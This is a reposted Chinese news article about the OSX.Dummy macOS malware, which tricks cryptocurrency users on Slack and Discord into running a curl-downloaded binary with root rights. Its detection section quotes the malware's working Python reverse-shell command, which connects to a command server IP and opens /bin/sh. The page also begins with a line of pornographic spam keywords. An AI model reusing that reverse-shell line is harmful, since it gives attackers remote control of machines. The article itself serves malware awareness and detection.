中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

MacOS出現(xiàn)新型OSX.Dummy惡意軟件

2018-07-04    來源:IT運(yùn)維網(wǎng)

容器云強(qiáng)勢上線!快速搭建集群,上萬Linux鏡像隨意使用

      近期,MacOS上又傳播一種新型的惡意軟件,被稱為OSX.Dummy。攻擊者通過欺騙和引導(dǎo)用戶下載和執(zhí)行惡意二進(jìn)制文件,如果文件被執(zhí)行,并且惡意軟件能夠連接到對手的C2服務(wù)器(命令控制服務(wù)器),攻擊者就可以控制目標(biāo)系統(tǒng)。 使用MacOS惡意軟件的黑客瞄準(zhǔn)使用Slack和Discord聊天平臺的加密貨幣投資者。被稱為OSX.Dummy的惡意軟件使用了一種不太復(fù)雜的感染方法,但是也有許多用戶被感染,并在受害電腦上遠(yuǎn)程執(zhí)行任意代碼。

惡意軟件OSX.Dummy簡介

      研究人員Remco Verhoef首先發(fā)現(xiàn)并描述了惡意軟件,并向SANS InfoSec Handlers Diary Blog發(fā)布了他的發(fā)現(xiàn)。研究人員說,他上周觀察到多次攻擊。
通過假冒來自加密相關(guān)的Slack或Discord聊天組的管理員或關(guān)鍵人物。分享惡意代碼,導(dǎo)致下載和執(zhí)行惡意二進(jìn)制文件 。

      Wardle指出,這個二進(jìn)制文件沒有簽名,并補(bǔ)充說,惡意軟件能夠避開macOS Gatekeeper安全軟件。

“通常,這樣的二進(jìn)制文件將被網(wǎng)關(guān)阻止。但是,如果用戶 通過終端命令直接 下載并運(yùn)行二進(jìn)制文件  ,網(wǎng)關(guān)不會發(fā)揮作用,因此無符號二進(jìn)制文件將被允許執(zhí)行,內(nèi)置的macOS惡意軟件緩解將不再起作用。”
      被稱為惡意軟件OSX.Dummy,因?yàn)橛糜谵D(zhuǎn)儲受害者密碼的目錄之一被稱為“/ tmp / dumpdummy”。

惡意軟件攻擊原理分析

      攻擊者會誘使用戶執(zhí)行腳本,然后通過cURL下載重要的34Mb OSX.Dummy惡意軟件。下載文件保存在macOS / tmp / script目錄下,然后執(zhí)行。
“該文件是一個大型的mach064二進(jìn)制文件(34M),在VirusTotal上評分為0/60,”

      該腳本欺騙受害者下載OSX.Dummy。

      當(dāng)執(zhí)行惡意軟件二進(jìn)制文件時,macOS sudo命令(通過終端)將惡意軟件的權(quán)限更改為root。“他要求用戶在終端上輸入他們的密碼,”根據(jù)Apple的說法,“要在Mac上的終端中執(zhí)行sudo命令,您必須使用具有密碼的管理員帳戶登錄。” 成功安裝以后,惡意軟件會丟棄各種macOS目錄中的代碼,包括“/Library/LaunchDaemons/com.startup.plist”,它提供了OSX.Dummy持久性。

 

      Wardle指出,如果攻擊成功,并且惡意軟件能夠連接到對手的C2服務(wù)器,攻擊者就可以控制目標(biāo)系統(tǒng)。

最后 檢測及防范方法

      今天我們分析了一個新的mac惡意軟件。我稱之為OSX.Dummy為:
  • 感染方法很愚蠢
  • 二進(jìn)制的巨大規(guī)模是愚蠢的
  • 持久性機(jī)制是蹩腳的(因此也是愚蠢的)
  • 能力相當(dāng)有限(因而相當(dāng)愚蠢)
  • 在每一步(愚蠢)檢測都是微不足道的
  • ...最后,惡意軟件將用戶的密碼保存到 dumpdummy

      要檢查您是否被感染,請以root身份運(yùn)行KnockKnock(因?yàn)閻阂廛浖慕M件只能由root讀。。查找 com.startup.plist 執(zhí)行名為'script.sh' 的未簽名啟動項(xiàng):

      還可以查找以root身份運(yùn)行的python運(yùn)行實(shí)例,并使用上述反向shell命令:

$ ps aux | grep -i python
root python -c import socket,subprocess,os; 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 
s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);

轉(zhuǎn)自:安全加

標(biāo)簽: 安全 代碼 服務(wù)器 腳本 權(quán)限

版權(quán)申明:本站文章部分自網(wǎng)絡(luò),如有侵權(quán),請聯(lián)系:west999com@outlook.com
特別注意:本站所有轉(zhuǎn)載文章言論不代表本站觀點(diǎn)!
本站所提供的圖片等素材,版權(quán)歸原作者所有,如需使用,請與原作者聯(lián)系。

上一篇:Radware研究發(fā)現(xiàn),多數(shù)企業(yè)在過去一年曾經(jīng)向黑客支付了贖金

下一篇:華為發(fā)布光業(yè)務(wù)故障預(yù)測解決方案